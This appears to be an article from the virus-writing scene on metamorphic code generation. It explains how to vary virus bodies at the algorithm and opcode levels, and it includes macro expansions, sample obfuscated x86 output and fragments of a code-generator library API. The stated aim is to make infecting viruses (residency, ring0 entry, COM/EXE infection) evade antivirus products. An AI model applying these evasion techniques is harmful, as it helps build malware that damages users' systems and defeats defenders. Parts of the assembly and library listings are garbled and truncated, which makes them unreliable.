Here will be described some ideas about polymorphic code generation.
So, our task is to generate code of the following properties:
performing some specified actions
polymorphic
similar to code generated by the HLL compilers
different to code used in the known viruses
Two generated (metamorphic) virus bodies may differ:
on the algorithm-level
on the opcode-level
What is algorithm-level?
All the generated (metamorphic) body consists of interchangeable algorithmic parts, in other words of blocks performing single tasks, such as file operations, ring0-entering, residency, handlers, infecting subroutines, etc., and each of these blocks may have some variants. I.e. on this level generated body consists of kinda subroutines and each of them is randomly selected (from the predefined set) while generation.
What is opcode-level?
This just means that each pseudo-language element (which is base of the algorithmic-level) may be converted (compiled) into different set of opcodes; then these opcodes may be changed and/or mixed.
Example
Task: calculate f(x) = 10 * sin(2 * x)
------------------------ algorithm-level ----------------------->
|
| f(x) = 10*sin(2*x) f(x) = sin(x)*cos(x)*20
|
| variant 1 variant 2
|
| t = x t = x
opcode- t = t * 2 a = sin(t)
-level t = sin(t) b = cos(t)
| t = t * 10 t = a * b
| t = t * 20
|
| variant 3 variant 4
|
| t = 2 * x b = cos(x)
| a = sin(t) t = 20 * b
| t = 10 * a a = sin(x)
| t = t * a
Algorithm generation
It is clear, that we can not change code on the algorithm-level, so all the variants of some action must be predefined. The more variants of the same actions u use, the more your virus will fuck av asses. Lets imagine virus consisting of blocks A and B, and each of them has two variants: A1/A2 and B1/B2. So, we have 4 different viruses: A1B1, A1B2, A2B1 and A2B2. For example A1=residensy, A2=current directory scanning, B1=COM infection and B2=EXE infection. And each of A1/A2/... subblocks may be changed in the same way, and so on.
Code generation
This is the main objective of this article. May be said that metamorphic code generator is kinda virus constructor which works automatically and produces not source but code.
So, we have one variant of the algorithm which is represented using variables. Farther, all operations between these variables will be realized using registers.
This allows us:
to use fixed set of opcodes, which is easy and similar to HLL-code;
to use lots of garbage ('coz there will be no globally used registers)
to write badly disassemling code
So, on the level of variables the following macros may be used:
These variable-level macros are expanded into register-level:
cmd v, c
mov r, c
cmd v, r
cmd v1, [v2]
mov r2, v2 ...
cmd r1, [r2]
mov v1, r1
cmd [v1], v2
mov r1, v1
mov r2, v2
cmd [r1], r2
cmd v1, v2
mov r1, v1 mov r1, v1 mov r2, v2
mov r2, v2 cmd r1, v2 cmd v1, r2
cmd r1, r2 mov v1, r1
mov v1, r1
cmd r, v
mov r1, offset v cmd r, v
cmd r, [r1]
mov v, r
mov r1, offset v cmd v, r
cmd [r1], r
mov r, c
...
At the end of this text, there are CODE GENERATOR library which allows you to generate code which will work with variables on the register-level.
Lets our task be to calculate: c = a xor b, where a, b and c are memory-variables. Then CODEGEN library allows you just to do:
leaedi, outbuf
push c_mov push offset c push offset a call cmd_v_v ; mov c, a
push c_xor push offset c push offset b call cmd_v_v ; xor c, b
Or, using macros, write:
leaedi, outbuf
call3 cmd_v_v, c_mov, <offset c>, <offset a> ; c = a
call3 cmd_v_v, c_xor, <offset c>, <offset b> ; c ^= b
After that, the following code will be generated:
variant 1variant 2
push 0C84B53DEh mov eax,[1000400Ch]
pop ebx mov [10004014h],eax
add ebx, 47B4EC2Eh push d,[10004010h]
mov ecx, [ebx] pop ecx
mov ebx, ecx mov edx,0C8417FA7h
push 78F2C937h add edx,47BEC06Dh
pop eax xor [edx],ecx
sub eax, 68F28923h
mov [eax], ebx
push 0CC8FF745h
pop eax
add eax, 437048CBh
push dword ptr [eax]
pop edx
push edx
pop ebx
push 0AE0577D4h
pop esi
xor esi, 0BC5A5A6Dh
sub esi, 75F6D972h
sub esi, 78BBFB1Bh
xor esi, 0C9CC8138h
sub esi, 993B95D9h
sub esi, 81A3404Eh
add esi, 407E3E27h
xor [esi], ebx
You may also include the following subroutine into your source:
endcmd:moval,90h; nop stosb ret
This subroutine will be called after each new opcode is stored into output buffer. It it easy to understand that it may be replaced with garbage generator or simply with RET.
Here is an example of the 'c = a xor b' generator with usage of ETG garbage generator:
;cmd_v_c: stack:cmd,v,c edi ;cmd_v_v: stack:cmd,v1,v2 edi ;cmd_v_memv: stack:cmd,v1,v2 edi ;cmd_memv_v: stack:cmd,v1,v2 edi
;cmd_r_r: stack:cmd,r1,r2 edi ;mov_r_offsv: stack:r,v edi ;cmd_r_c: stack:cmd,r,c edi ;cmd_r_memr: stack:cmd,r1,r2 edi ;cmd_memr_r: stack:cmd,r1,r2 edi ;cmd_r_v: stack:cmd,r,v edi ;cmd_v_r: stack:cmd,v,r edi